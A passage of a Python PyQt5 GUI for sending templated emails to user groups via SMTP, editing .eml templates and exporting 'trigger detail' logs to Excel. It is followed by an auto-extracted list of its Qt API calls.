QMessageBox.Ok) else: sm = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) if self.data_smtp else Smtp() db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db else Database() insert_send_mail(eml_type, eml_file, user_group, mail_excel, sm, db, annex=annex_file, url=url) sm.close() db.__disconnect__() QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok) def show_sub_win(self): if self.data_smtp: self.sub_win = SubWindow() self.sub_win.btn_send.clicked.connect(self.send_test) self.sub_win.show() else: QMessageBox.warning(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok) def send_test(self): try: if self.data_smtp: mailserver = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) mail_msg = gm.gen_test_eml(['Test Email', '測試寄件人', self.data_smtp[2], self.sub_win.in_recipient.text()], self.data_smtp[5]) error = mailserver.send(mail_msg.as_string(), self.data_smtp[2], self.sub_win.in_recipient.text()) mailserver.close() if error: QMessageBox.warning(self, 'Warning!', '信件寄出成功!\nWaning: '+error, QMessageBox.Ok) else: QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok) self.sub_win.in_recipient.clear() except: QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok) def eml_open(self): self.in_edit_html.clear() file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)") if not file_name: return header, html = gm.get_msg(file_name) self.in_edit_sender.setText(header[2]) self.in_edit_sender_name.setText(header[1]) self.in_edit_subject.setText(header[0]) self.in_edit_html.insertPlainText(html) def eml_save(self): header, msg = [], '' header.append(self.in_edit_subject.text()) header.append(self.in_edit_sender_name.text()) header.append(self.in_edit_sender.text()) header.append('[email protected]') annex_file = self.in_edit_annex.text().split(',') html = self.in_edit_html.toPlainText() if not any(header[:3]) or not html: return try: msg = gm.gen_eml(header, html, annex_file) if self.cb_edit_annex.isChecked() else gm.gen_eml(header, html) file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.eml)') with open(file_path, 'w') as outfile: gen = generator.Generator(outfile) gen.flatten(msg) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) def eml_reset(self): items = self.get_items_from_layout(self.right_layout) for item in items: if type(item) == type(QLineEdit()): item.clear() self.cb_edit_annex.setChecked(False) self.in_edit_html.clear() def logs_change(self): if not self.data_logs or not self.in_logs_data.text(): return self.data_temp_logs = [] self.tbw_logs.setRowCount(0) # header = {'郵件類型':'type', '郵件主旨':'subject', '使用者群組':'user_group', '使用者信箱':'user_email'} condition = self.cmb_logs_choice.currentText() content = self.in_logs_data.text() row_num = len(self.data_logs) col_num = len(self.data_logs[0]) # self.tbw_logs.setRowCount(row_num) self.tbw_logs.setColumnCount(col_num) for i in range(row_num): switch = False if condition == 'date' and content in str(self.data_logs[i][condition]): switch = True elif self.data_logs[i][condition] == content: switch = True if switch: self.tbw_logs.insertRow(self.tbw_logs.rowCount()) row_data = list(self.data_logs[i].values()) self.data_temp_logs.append(self.data_logs[i]) for j in range(col_num): temp_data = row_data[j] item = QTableWidgetItem(str(temp_data)) item.setForeground(QBrush(QColor(144, 182, 240))) self.tbw_logs.setItem(self.tbw_logs.rowCount()-1, j, item) def logs_download(self): if self.data_temp_logs: try: file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.xlsx)') if not file_path: return df = DataFrame(self.data_temp_logs) df.to_excel(file_path, index=False) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) else: QMessageBox.warning(self, "缺少資料", "請確認是否有資料可以下載", QMessageBox.Ok) def quit_act(self): # sender 是发送信号的对象 sender = self.sender() print(sender.text() + '键被按下') qApp = QApplication.instance() qApp.quit() def main(): app = QApplication(sys.argv) gui = MailserverUi() gui.show() sys.exit(app.exec_()) if __name__ == '__main__': main()
[((542, 10, 542, 32), 'PyQt5.QtWidgets.QApplication', 'QApplication', ({(542, 23, 542, 31): 'sys.argv'}, {}), '(sys.argv)', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((29, 27, 29, 40), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((35, 28, 35, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((37, 24, 37, 45), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(37, 36, 37, 44): '"""寄送"""'}, {}), "('寄送')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((44, 8, 44, 48), 'pyqtgraph.setConfigOption', 'setConfigOption', ({(44, 24, 44, 36): '"""background"""', (44, 38, 44, 47): '"""#19232D"""'}, {}), "('background', '#19232D')", False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((45, 8, 45, 42), 'pyqtgraph.setConfigOption', 'setConfigOption', ({(45, 24, 45, 36): '"""foreground"""', (45, 38, 45, 41): '"""d"""'}, {}), "('foreground', 'd')", False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((46, 8, 46, 42), 'pyqtgraph.setConfigOptions', 'setConfigOptions', (), '', False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((82, 27, 82, 36), 'PyQt5.QtWidgets.QWidget', 'QWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((84, 27, 84, 40), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((89, 27, 89, 36), 'PyQt5.QtWidgets.QWidget', 'QWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((91, 27, 91, 40), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((95, 28, 95, 37), 'PyQt5.QtWidgets.QWidget', 'QWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((97, 28, 97, 41), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((108, 28, 108, 55), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(108, 40, 108, 54): '"""發送信件"""'}, {}), "('發送信件')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((110, 24, 110, 51), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(110, 36, 110, 50): '"""系統設定"""'}, {}), "('系統設定')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((112, 22, 112, 52), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(112, 34, 112, 51): '"""資料庫設定"""'}, {}), "('資料庫設定')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((114, 30, 114, 57), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(114, 42, 114, 56): '"""修改樣板"""'}, {}), "('修改樣板')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((116, 28, 116, 56), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(116, 40, 116, 55): '"""\x08觸發明細"""'}, {}), "('\\x08觸發明細')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((118, 33, 118, 66), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(118, 45, 118, 65): '"""下載觸發明細"""'}, {}), "('下載觸發明細')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((120, 24, 120, 45), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(120, 36, 120, 44): '"""退出"""'}, {}), "('退出')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((132, 23, 132, 34), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((137, 28, 137, 42), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((141, 29, 141, 51), 'pyqtgraph.GraphicsLayoutWidget', 'GraphicsLayoutWidget', ({}, {}), '()', False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((145, 27, 145, 38), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((146, 31, 146, 42), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((147, 30, 147, 51), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(147, 42, 147, 50): '"""瀏覽"""'}, {}), "('瀏覽')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((149, 34, 149, 45), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((150, 34, 150, 45), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((151, 36, 151, 57), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(151, 48, 151, 56): '"""瀏覽"""'}, {}), "('瀏覽')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((153, 29, 153, 40), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((154, 30, 154, 51), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(154, 42, 154, 50): '"""瀏覽"""'}, {}), "('瀏覽')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((159, 28, 159, 47), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ({(159, 38, 159, 46): '"""使用"""'}, {}), "('使用')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((160, 34, 160, 55), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(160, 46, 160, 54): '"""執行"""'}, {}), "('執行')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((164, 28, 164, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((165, 28, 165, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((166, 28, 166, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((167, 32, 167, 43), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((168, 27, 168, 46), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ({(168, 37, 168, 45): '"""使用"""'}, {}), "('使用')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((169, 28, 169, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((170, 29, 170, 50), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(170, 41, 170, 49): '"""儲存"""'}, {}), "('儲存')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((172, 29, 172, 50), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(172, 41, 172, 49): '"""測試"""'}, {}), "('測試')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((176, 26, 176, 37), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((177, 26, 177, 37), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((178, 26, 178, 37), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((179, 30, 179, 41), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((180, 30, 180, 41), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((181, 28, 181, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((183, 27, 183, 48), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(183, 39, 183, 47): '"""儲存"""'}, {}), "('儲存')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((187, 30, 187, 41), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((188, 35, 188, 46), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((189, 29, 189, 45), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ({(189, 39, 189, 44): '"""是"""'}, {}), "('是')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((190, 29, 190, 40), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((191, 30, 191, 51), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(191, 42, 191, 50): '"""瀏覽"""'}, {}), "('瀏覽')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((193, 31, 193, 42), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((195, 24, 195, 36), 'PyQt5.QtWidgets.QTabWidget', 'QTabWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((198, 26, 198, 35), 'PyQt5.QtWidgets.QWidget', 'QWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((199, 26, 199, 35), 'PyQt5.QtWidgets.QWidget', 'QWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((203, 21, 203, 34), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((204, 21, 204, 34), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((209, 28, 209, 39), 'PyQt5.QtWidgets.QTextEdit', 'QTextEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((210, 27, 210, 43), 'PyQt5.QtWebEngineWidgets.QWebEngineView', 'QWebEngineView', ({}, {}), '()', False, 'from PyQt5.QtWebEngineWidgets import QWebEngineView\n'), ((214, 34, 214, 55), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(214, 46, 214, 54): '"""清除"""'}, {}), "('清除')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((216, 33, 216, 54), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(216, 45, 216, 53): '"""讀取"""'}, {}), "('讀取')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((218, 33, 218, 54), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(218, 45, 218, 53): '"""儲存"""'}, {}), "('儲存')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((222, 24, 222, 38), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((224, 31, 224, 42), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((225, 28, 225, 39), 